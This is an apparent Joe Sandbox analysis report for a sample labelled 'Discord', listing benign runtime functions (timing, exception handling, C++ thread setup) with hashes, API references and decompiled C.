Instruction ID: a4bfbb586771a64bdcc8a97e3c9405929888c8532b79b342e786429cca8d1888
Opcode Fuzzy Hash: 1c65fc73216ec635cd8940ec7e19918af3fdabcc223746e42e7f2e7ae18302e4
Instruction Fuzzy Hash: 73D1E631A097068BD7018E2AC48035AB7E2BFC5754F75C52DE89C9F39ADF34D9458B82

Uniqueness

Uniqueness Score: -1.00%

Function 00401F10 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00401F48
GetCurrentProcessId.KERNEL32 ref: 00401F59
GetCurrentThreadId.KERNEL32 ref: 00401F61
GetTickCount.KERNEL32 ref: 00401F6A
QueryPerformanceCounter.KERNEL32 ref: 00401F79

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: f2dbd2c9890a91b4beef07b9ed1973cf804c4030d3aa6c3f04ed15de8290055e
Instruction ID: b1ac02b456b03022bb8e1e1e986a95a3a93815d3db321895b0a21d28946da671
Opcode Fuzzy Hash: f2dbd2c9890a91b4beef07b9ed1973cf804c4030d3aa6c3f04ed15de8290055e
Instruction Fuzzy Hash: 3811F376D042188BCB10AFA9E9485CEFBB4FB0C225F454536E805B7350DB35A9548FAA

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8E56C Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6DE8E5BF
UnhandledExceptionFilter.KERNEL32 ref: 6DE8E5CF
GetCurrentProcess.KERNEL32 ref: 6DE8E5D8
TerminateProcess.KERNEL32 ref: 6DE8E5E9
abort.MSVCRT ref: 6DE8E5F2

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: f64a8666d9ed00021213ca4b7ebd9c3bdbad4f88c84ec72924a152611c6bf41f
Instruction ID: ce9003f6783017dbe29663487ad7963f2e9e73fc6b0848f98cd16eb5209d5e74
Opcode Fuzzy Hash: f64a8666d9ed00021213ca4b7ebd9c3bdbad4f88c84ec72924a152611c6bf41f
Instruction Fuzzy Hash: 3D0192B4806605DFDB10EFB9C5492597BF0BB0A704F01592EEA49EB340E774A9488F42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8E570 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6DE8E5BF
UnhandledExceptionFilter.KERNEL32 ref: 6DE8E5CF
GetCurrentProcess.KERNEL32 ref: 6DE8E5D8
TerminateProcess.KERNEL32 ref: 6DE8E5E9
abort.MSVCRT ref: 6DE8E5F2

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 19aad01dc1fdeecf935f5930748339c2ea521b432e1e4684a3eeaf1c756b45df
Instruction ID: 21b05184d840ba9e1e38e5c01a5eb72a47d6f553bf601d257c87562ffd66854b
Opcode Fuzzy Hash: 19aad01dc1fdeecf935f5930748339c2ea521b432e1e4684a3eeaf1c756b45df
Instruction Fuzzy Hash: 1901A4B4806605DFDB10EFB9C54934D7BF0BB06704F00552EEA49DB340E77499488F42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE90C70 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 1318COMMON

Download Yara Rule

Strings

, xrefs: 6DE920DD
9, xrefs: 6DE92001
NaN, xrefs: 6DE90DBC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID: $9$NaN
API String ID: 0-3658208743
Opcode ID: 5fc3cf17f53ce918d7d9e3251f104988c37920a3e7925f2d596b485819b22a6f
Instruction ID: 6f24d199ad5cc2d54e289e2da8b1eefa1ae44127c010402f25499359a11faa5a
Opcode Fuzzy Hash: 5fc3cf17f53ce918d7d9e3251f104988c37920a3e7925f2d596b485819b22a6f
Instruction Fuzzy Hash: 12C232B1A0E3418FC7119F69C18435ABBF4BF89388F618D1DE8999B351EB71D845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94DF0 Relevance: 4.5, APIs: 3, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E6DE94DF0(intOrPtr* __eax, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v12;
				intOrPtr* _v16;
				char _v20;
				char* _t18;
				intOrPtr* _t21;
				intOrPtr* _t22;
				void* _t29;
				intOrPtr* _t30;
				intOrPtr* _t35;

				_t30 = _t29 - 0x20;
				 *__ecx = 0;
				 *_t30 = 0x1c;
				L6DE8DDA8();
				_t21 = __eax;
				 *((intOrPtr*)(__eax + 4)) = 1;
				 *((intOrPtr*)(__eax + 8)) = 1;
				 *__eax = 0x6de98a00;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				 *((intOrPtr*)(__eax + 0x14)) = 0;
				 *((intOrPtr*)(__eax + 0xc)) = 0x6de989d0;
				 *((intOrPtr*)(__eax + 0x18)) = _a4;
				 *_t30 =  &E6DE986AC;
				_v20 = E6DE94BF0(_a4, __eax);
				_t18 =  &_v20;
				_v16 = _t21;
				 *((intOrPtr*)(_t30 - 4)) = _t18;
				L6DE8DDB0();
				_t22 = _v16;
				_t35 = _t22;
				if(_t35 != 0) {
					asm("lock sub dword [ebx+0x4], 0x1");
					if(_t35 == 0) {
						_t18 =  *((intOrPtr*)( *_t22 + 8))();
						asm("lock sub dword [ebx+0x8], 0x1");
						if(__eflags == 0) {
							_t18 =  *((intOrPtr*)( *_t22 + 0xc))();
						}
					}
				}
				return _t18;
			}

0x6de94df7
0x6de94dfa
0x6de94e00
0x6de94e07
0x6de94e0c
0x6de94e0e
0x6de94e15
0x6de94e1c
0x6de94e22
0x6de94e2b
0x6de94e32
0x6de94e3c
0x6de94e3f
0x6de94e4b
0x6de94e4e
0x6de94e56
0x6de94e59
0x6de94e5c
0x6de94e61
0x6de94e67
0x6de94e69
0x6de94e6b
0x6de94e70
0x6de94e84
0x6de94e87
0x6de94e8c
0x6de94e92
0x6de94e92
0x6de94e8c
0x6de94e70
0x6de94e78

APIs

_Znwj.LIBSTDC++-6(?,?,?,?,?,?,?,6DE8862C), ref: 6DE94E07
_ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE14_M_get_deleterERKSt9type_info.DPUB1(?,?,?,?,?,?,?,6DE8862C), ref: 6DE94E46

Part of subcall function 6DE94BF0: _ZNKSt9type_infoeqERKS_.LIBSTDC++-6(?,?,?,?,00000000,6DE94E4B,?,?,?,?,?,?,?,6DE8862C), ref: 6DE94C04

_ZNSt6thread15_M_start_threadESt10shared_ptrINS_10_Impl_baseEE.LIBSTDC++-6(?,?,?,?,?,?,?,?,6DE8862C), ref: 6DE94E5C

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Bind_simpleE14_ImplImpl_baseLock_policyM_get_deleterM_start_threadN9__gnu_cxx12_S_10_Sp_counted_ptr_inplaceSt10shared_ptrSt12_St23_St6thread15_St6thread5_St9type_infoSt9type_infoeqZnwj
String ID:
API String ID: 1758183509-0
Opcode ID: 9e1e1c9a2e0f76c4792ab2837dc84720cb586f7cf55c2a91c57a606d91ae1ada
Instruction ID: d2759939d55c1d2c4d3dd4bd09bae9124fb88c3974b3c53af221dfee58c6b44e
Opcode Fuzzy Hash: 9e1e1c9a2e0f76c4792ab2837dc84720cb586f7cf55c2a91c57a606d91ae1ada
Instruction Fuzzy Hash: 5C114CB05062048FDB049F69C499BAABBF4BF05318F1580AEC5198F362CB75D948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94EB0 Relevance: 4.5, APIs: 3, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E6DE94EB0(intOrPtr* __eax, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v12;
				intOrPtr* _v16;
				char _v20;
				char* _t18;
				intOrPtr* _t21;
				intOrPtr* _t22;
				void* _t29;
				intOrPtr* _t30;
				intOrPtr* _t35;

				_t30 = _t29 - 0x20;
				 *__ecx = 0;
				 *_t30 = 0x1c;
				L6DE8DDA8();
				_t21 = __eax;
				 *((intOrPtr*)(__eax + 4)) = 1;
				 *((intOrPtr*)(__eax + 8)) = 1;
				 *__eax = 0x6de98a20;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				 *((intOrPtr*)(__eax + 0x14)) = 0;
				 *((intOrPtr*)(__eax + 0xc)) = 0x6de989e8;
				 *((intOrPtr*)(__eax + 0x18)) = _a4;
				 *_t30 =  &E6DE986AC;
				_v20 = E6DE94C60(_a4, __eax);
				_t18 =  &_v20;
				_v16 = _t21;
				 *((intOrPtr*)(_t30 - 4)) = _t18;
				L6DE8DDB0();
				_t22 = _v16;
				_t35 = _t22;
				if(_t35 != 0) {
					asm("lock sub dword [ebx+0x4], 0x1");
					if(_t35 == 0) {
						_t18 =  *((intOrPtr*)( *_t22 + 8))();
						asm("lock sub dword [ebx+0x8], 0x1");
						if(__eflags == 0) {
							_t18 =  *((intOrPtr*)( *_t22 + 0xc))();
						}
					}
				}
				return _t18;
			}

0x6de94eb7
0x6de94eba
0x6de94ec0
0x6de94ec7
0x6de94ecc
0x6de94ece
0x6de94ed5
0x6de94edc
0x6de94ee2
0x6de94eeb
0x6de94ef2
0x6de94efc
0x6de94eff
0x6de94f0b
0x6de94f0e
0x6de94f16
0x6de94f19
0x6de94f1c
0x6de94f21
0x6de94f27
0x6de94f29
0x6de94f2b
0x6de94f30
0x6de94f44
0x6de94f47
0x6de94f4c
0x6de94f52
0x6de94f52
0x6de94f4c
0x6de94f30
0x6de94f38

APIs

_Znwj.LIBSTDC++-6 ref: 6DE94EC7
_ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE14_M_get_deleterERKSt9type_info.DPUB1 ref: 6DE94F06

Part of subcall function 6DE94C60: _ZNKSt9type_infoeqERKS_.LIBSTDC++-6(?,?,?,?,00000000,6DE94F0B), ref: 6DE94C74

_ZNSt6thread15_M_start_threadESt10shared_ptrINS_10_Impl_baseEE.LIBSTDC++-6 ref: 6DE94F1C

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Bind_simpleE14_ImplImpl_baseLock_policyM_get_deleterM_start_threadN9__gnu_cxx12_S_10_Sp_counted_ptr_inplaceSt10shared_ptrSt12_St23_St6thread15_St6thread5_St9type_infoSt9type_infoeqZnwj
String ID:
API String ID: 1758183509-0
Opcode ID: f6175ea5993d2801b98a3ccd4ccd5e93c5916148400e37146697f1a2c1121eb4
Instruction ID: f354f6ecf849ff51cf54e8adcd8179d83ef8454b99ce4c39540f014b4bf371c3
Opcode Fuzzy Hash: f6175ea5993d2801b98a3ccd4ccd5e93c5916148400e37146697f1a2c1121eb4
Instruction Fuzzy Hash: 6A115EB0505205CFDB049F65D489BAABBF4BF05318F1580ADC9195F366CB75D448CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94D60 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_ZdlPv.LIBSTDC++-6 ref: 6DE94D7E

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586346a48d4c7f4b37acf93969aaab419093d82ce08f1dc74dbcb79af5309af8
Instruction ID: 63ebd8f83e9f5960b8cafd4d7e7ac8be9fea2142965efbc4806c1049749e2108
Opcode Fuzzy Hash: 586346a48d4c7f4b37acf93969aaab419093d82ce08f1dc74dbcb79af5309af8
Instruction Fuzzy Hash: F0E09BB45066108FDB05AF35D4CC51577A0AF0921D72D809DD41D4F326CF31C846C792

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94CC0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_ZdlPv.LIBSTDC++-6 ref: 6DE94CDE

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586346a48d4c7f4b37acf93969aaab419093d82ce08f1dc74dbcb79af5309af8
Instruction ID: 163c32026ca5beb4f414a129b9abec0efcccf256f181511575566aefeb41a661
Opcode Fuzzy Hash: 586346a48d4c7f4b37acf93969aaab419093d82ce08f1dc74dbcb79af5309af8
Instruction Fuzzy Hash: 18E065715062108FEB05AF35D4C851577A0AF0921D729809DD81E1F316DF31C847C796

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94C60 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_ZNKSt9type_infoeqERKS_.LIBSTDC++-6(?,?,?,?,00000000,6DE94F0B), ref: 6DE94C74

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: St9type_infoeq
String ID:
API String ID: 3946421061-0
Opcode ID: 728c40ee2ba6f8ddb47b3edd887c2ae48d9ae7a280878ee3fac348c2e5229112
Instruction ID: aebd115076d11c6ee281e2789233bf35cc579103328662c112d514e4257d26fa
Opcode Fuzzy Hash: 728c40ee2ba6f8ddb47b3edd887c2ae48d9ae7a280878ee3fac348c2e5229112
Instruction Fuzzy Hash: BFD022A22442084BC20039288CC634A73E8AB84214FD0013DCC8847303C6289A28CA93

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94BF0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_ZNKSt9type_infoeqERKS_.LIBSTDC++-6(?,?,?,?,00000000,6DE94E4B,?,?,?,?,?,?,?,6DE8862C), ref: 6DE94C04

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: St9type_infoeq
String ID:
API String ID: 3946421061-0
Opcode ID: 728c40ee2ba6f8ddb47b3edd887c2ae48d9ae7a280878ee3fac348c2e5229112
Instruction ID: aebd115076d11c6ee281e2789233bf35cc579103328662c112d514e4257d26fa
Opcode Fuzzy Hash: 728c40ee2ba6f8ddb47b3edd887c2ae48d9ae7a280878ee3fac348c2e5229112
Instruction Fuzzy Hash: BFD022A22442084BC20039288CC634A73E8AB84214FD0013DCC8847303C6289A28CA93

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94C90 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

_ZdlPv.LIBSTDC++-6 ref: 6DE94C96

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e6af525483fefb62ce4a16cf5973092d8d1ee54a8e0a90c1803e42b2a33f820
Instruction ID: 97851d37f85eb7eb9be8f15b3240994090a07a6cc1df4ee43be7ec21870a6507
Opcode Fuzzy Hash: 8e6af525483fefb62ce4a16cf5973092d8d1ee54a8e0a90c1803e42b2a33f820
Instruction Fuzzy Hash: 4AA002BDC08A445EC6157F2C554253879616990108FDB0AEDC98806357FB3A926846A7

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94C40 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

_ZdlPv.LIBSTDC++-6 ref: 6DE94C46

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e6af525483fefb62ce4a16cf5973092d8d1ee54a8e0a90c1803e42b2a33f820
Instruction ID: 97851d37f85eb7eb9be8f15b3240994090a07a6cc1df4ee43be7ec21870a6507
Opcode Fuzzy Hash: 8e6af525483fefb62ce4a16cf5973092d8d1ee54a8e0a90c1803e42b2a33f820
Instruction Fuzzy Hash: 4AA002BDC08A445EC6157F2C554253879616990108FDB0AEDC98806357FB3A926846A7

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94C20 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

_ZdlPv.LIBSTDC++-6 ref: 6DE94C26

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e6af525483fefb62ce4a16cf5973092d8d1ee54a8e0a90c1803e42b2a33f820
Instruction ID: 97851d37f85eb7eb9be8f15b3240994090a07a6cc1df4ee43be7ec21870a6507
Opcode Fuzzy Hash: 8e6af525483fefb62ce4a16cf5973092d8d1ee54a8e0a90c1803e42b2a33f820
Instruction Fuzzy Hash: 4AA002BDC08A445EC6157F2C554253879616990108FDB0AEDC98806357FB3A926846A7

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94BD0 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

_ZdlPv.LIBSTDC++-6 ref: 6DE94BD6

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e6af525483fefb62ce4a16cf5973092d8d1ee54a8e0a90c1803e42b2a33f820
Instruction ID: 97851d37f85eb7eb9be8f15b3240994090a07a6cc1df4ee43be7ec21870a6507
Opcode Fuzzy Hash: 8e6af525483fefb62ce4a16cf5973092d8d1ee54a8e0a90c1803e42b2a33f820
